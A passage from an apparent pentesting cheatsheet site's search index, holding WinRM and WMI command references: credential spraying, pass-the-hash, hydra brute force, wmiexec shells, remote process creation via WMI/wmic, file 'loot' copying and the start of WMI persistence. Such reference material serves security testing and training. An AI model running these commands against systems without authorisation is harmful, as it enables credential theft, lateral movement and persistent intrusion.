credentials\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Credential spray\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u users.txt -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pass-the-Hash\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Execute commands\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;whoami\u0026#39;\u003c/span\u003e      \u003cspan 
style=\"color:#75715e\"\u003e# CMD\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;whoami\u0026#39;\u003c/span\u003e      \u003cspan style=\"color:#75715e\"\u003e# PowerShell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;Get-Process\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"powershell--windows-native\"\u003ePowerShell / Windows Native\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Test WinRM connectivity\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eTest-WSMan -ComputerName \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eTest-WSMan -ComputerName \u0026lt;ip\u0026gt; -UseSSL\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Interactive remote session\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEnter-PSSession -ComputerName \u0026lt;ip\u0026gt; -Credential 
\u0026lt;user\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEnter-PSSession -ComputerName \u0026lt;ip\u0026gt; -UseSSL -Credential \u0026lt;user\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Non-interactive / scripted\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$cred = Get-Credential\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$sess = New-PSSession -ComputerName \u0026lt;ip\u0026gt; -Credential $cred\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eInvoke-Command -Session $sess -ScriptBlock { whoami; hostname }\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eInvoke-Command -ComputerName \u0026lt;ip\u0026gt; -Credential $cred -ScriptBlock { ipconfig }\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Copy files over WinRM\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCopy-Item -Path C:\\local\\file.exe -Destination C:\\remote\\ -ToSession $sess\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eCopy-Item -Path C:\\remote\\loot.txt -Destination C:\\local\\ -FromSession $sess\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 
id=\"impacket\"\u003eimpacket\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# winrm_exec (alternative)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 winrm_exec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec winrm \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt \u0026lt;ip\u0026gt; -s \u003cspan style=\"color:#ae81ff\"\u003e5985\u003c/span\u003e http-post-form \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;/wsman:Username=^USER^\u0026amp;Password=^PASS^:401\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-scenarios\"\u003eCommon Scenarios\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ePwned user is in group:\n  \u0026#34;Remote Management Users\u0026#34;  → Can 
use WinRM\n  \u0026#34;Administrators\u0026#34;            → Full access via WinRM\n\nCheck group membership:\nnet localgroup \u0026#34;Remote Management Users\u0026#34;\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"key-facts\"\u003eKey Facts\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRequires user to be in \u003cstrong\u003eRemote Management Users\u003c/strong\u003e or \u003cstrong\u003eAdministrators\u003c/strong\u003e group\u003c/li\u003e\n\u003cli\u003eCan be enabled with: \u003ccode\u003eEnable-PSRemoting -Force\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFirewall rule: \u003ccode\u003eWinRM-HTTP-In-TCP\u003c/code\u003e (port 5985)\u003c/li\u003e\n\u003cli\u003eOften enabled on Domain Controllers and management servers\u003c/li\u003e\n\u003c/ul\u003e","title":"WinRM"},{"content":"WMI Enumeration Cheatsheet Default Ports: 135 (DCOM endpoint mapper), dynamic high ports (TCP 49152–65535)\nWhat is WMI? Windows Management Instrumentation — a core Windows API for querying system state and executing code remotely. 
Uses DCOM over RPC.\nDetection nmap -p 135 \u0026lt;ip\u0026gt; nmap -p 135 -sV \u0026lt;ip\u0026gt; nmap -p 135 --script msrpc-enum \u0026lt;ip\u0026gt; impacket — wmiexec.py # Interactive shell python3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; # Single command python3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; \u0026#34;whoami\u0026#34; python3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; \u0026#34;ipconfig /all\u0026#34; # Pass-the-Hash python3 wmiexec.py -hashes :\u0026lt;nthash\u0026gt; \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; python3 wmiexec.py -hashes \u0026lt;lmhash\u0026gt;:\u0026lt;nthash\u0026gt; \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; # Without domain (local account) python3 wmiexec.py ./\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; CrackMapExec crackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; crackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u0026#39;whoami\u0026#39; crackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt; crackmapexec wmi 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; PowerShell WMI (Local \u0026amp; Remote) # Local system queries Get-WmiObject -Class Win32_OperatingSystem Get-WmiObject -Class Win32_ComputerSystem Get-WmiObject -Class Win32_Process Get-WmiObject -Class Win32_UserAccount Get-WmiObject -Class Win32_Group Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Where IPAddress -ne $null Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq \u0026#34;Running\u0026#34; } Get-WmiObject -Class Win32_Product # Installed software (slow) Get-WmiObject -Class Win32_LogicalDisk Get-WmiObject -Class Win32_StartupCommand # Startup 
items # Modern equivalent (CIM) Get-CimInstance -ClassName Win32_OperatingSystem Get-CimInstance -ClassName Win32_Process # Remote queries $cred = Get-Credential Get-WmiObject -Class Win32_OperatingSystem -ComputerName \u0026lt;ip\u0026gt; -Credential $cred Get-WmiObject -Class Win32_Process -ComputerName \u0026lt;ip\u0026gt; -Credential $cred PowerShell WMI Remote Code Execution # Execute command via WMI (leaves process behind) $cred = Get-Credential Invoke-WmiMethod -Class Win32_Process -Name Create ` -ArgumentList \u0026#34;cmd.exe /c whoami \u0026gt; C:\\output.txt\u0026#34; ` -ComputerName \u0026lt;ip\u0026gt; -Credential $cred # Check output Get-WmiObject -Class CIM_DataFile -Filter \u0026#34;Name=\u0026#39;C:\\output.txt\u0026#39;\u0026#34; ` -ComputerName \u0026lt;ip\u0026gt; -Credential $cred wmic (Legacy CLI — Windows) :: Local wmic os get Caption,Version,BuildNumber wmic process list brief wmic useraccount list brief wmic group list brief wmic service where \u0026#34;State=\u0026#39;Running\u0026#39;\u0026#34; list brief wmic product get Name,Version :: Installed software wmic startupinfo list full :: Remote wmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; os get Caption wmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; process call create \u0026#34;cmd.exe /c whoami \u0026gt; C:\\out.txt\u0026#34; wmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; useraccount list brief WQL Queries # WQL = WMI Query Language (SQL-like) Get-WmiObject -Query \u0026#34;SELECT * FROM Win32_Process WHERE Name=\u0026#39;lsass.exe\u0026#39;\u0026#34; Get-WmiObject -Query \u0026#34;SELECT * FROM Win32_Service WHERE StartMode=\u0026#39;Auto\u0026#39; AND State=\u0026#39;Stopped\u0026#39;\u0026#34; Get-WmiObject -Query \u0026#34;SELECT * FROM Win32_UserAccount WHERE LocalAccount=True\u0026#34; Metasploit use exploit/windows/smb/psexec # Uses WMI/DCOM 
under the hood use exploit/windows/local/wmi # Post-exploitation WMI persistence use auxiliary/scanner/winrm/winrm_wql # WQL via WinRM WMI Persistence (Post-Exploitation) # Create permanent WMI event subscription (fileless persistence) $filter = Set-WmiInstance -Class __EventFilter -Namespace \u0026#34;root\\subscription\u0026#34; -Arguments @{ Name = \u0026#34;PentestFilter\u0026#34; EventNameSpace = \u0026#34;root ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/wmi/","summary":"\u003ch1 id=\"wmi-enumeration-cheatsheet\"\u003eWMI Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 135 (DCOM endpoint mapper), dynamic high ports (TCP 49152–65535)\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eWhat is WMI?\u003c/strong\u003e Windows Management Instrumentation — a core Windows API for querying system state and executing code remotely. Uses DCOM over RPC.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection\"\u003eDetection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e135\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e135\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e135\u003c/span\u003e --script msrpc-enum \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"impacket--wmiexecpy\"\u003eimpacket — wmiexec.py\u003c/h2\u003e\n\u003cdiv 
class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Interactive shell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Single command\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;whoami\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;ipconfig /all\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pass-the-Hash\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py -hashes :\u0026lt;nthash\u0026gt; \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py -hashes 
\u0026lt;lmhash\u0026gt;:\u0026lt;nthash\u0026gt; \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Without domain (local account)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 wmiexec.py ./\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"crackmapexec\"\u003eCrackMapExec\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;whoami\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec wmi \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec wmi 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"powershell-wmi-local--remote\"\u003ePowerShell WMI (Local \u0026amp; Remote)\u003c/h2\u003e\n\u003cdiv 
class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Local system queries\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_OperatingSystem\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_ComputerSystem\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_Process\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_UserAccount\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_Group\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_NetworkAdapterConfiguration | Where IPAddress \u003cspan style=\"color:#f92672\"\u003e-ne\u003c/span\u003e $null\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_Service | Where-Object { $_.State \u003cspan style=\"color:#f92672\"\u003e-eq\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Running\u0026#34;\u003c/span\u003e }\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_Product          \u003cspan style=\"color:#75715e\"\u003e# Installed software (slow)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_LogicalDisk\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_StartupCommand   \u003cspan style=\"color:#75715e\"\u003e# Startup items\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Modern equivalent (CIM)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-CimInstance -ClassName Win32_OperatingSystem\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-CimInstance -ClassName Win32_Process\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Remote queries\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$cred = Get-Credential\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_OperatingSystem -ComputerName \u0026lt;ip\u0026gt; -Credential $cred\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class Win32_Process -ComputerName \u0026lt;ip\u0026gt; -Credential $cred\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"powershell-wmi-remote-code-execution\"\u003ePowerShell WMI Remote Code Execution\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan 
style=\"color:#75715e\"\u003e# Execute command via WMI (leaves process behind)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$cred = Get-Credential\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eInvoke-WmiMethod -Class Win32_Process -Name Create `\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -ArgumentList \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;cmd.exe /c whoami \u0026gt; C:\\output.txt\u0026#34;\u003c/span\u003e `\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -ComputerName \u0026lt;ip\u0026gt; -Credential $cred\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Check output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Class CIM_DataFile -Filter \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Name=\u0026#39;C:\\output.txt\u0026#39;\u0026#34;\u003c/span\u003e `\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -ComputerName \u0026lt;ip\u0026gt; -Credential $cred\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"wmic-legacy-cli--windows\"\u003ewmic (Legacy CLI — Windows)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-cmd\" data-lang=\"cmd\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e:\u003cspan style=\"color:#75715e\"\u003e: Local\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003ewmic os get Caption,Version,BuildNumber\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic process list brief\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic useraccount list brief\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic group list brief\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic service where \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;State=\u0026#39;Running\u0026#39;\u0026#34;\u003c/span\u003e list brief\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic product get Name,Version        :: Installed software\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic startupinfo list full\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e:\u003cspan style=\"color:#75715e\"\u003e: Remote\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; os get Caption\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; process call create \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;cmd.exe /c whoami 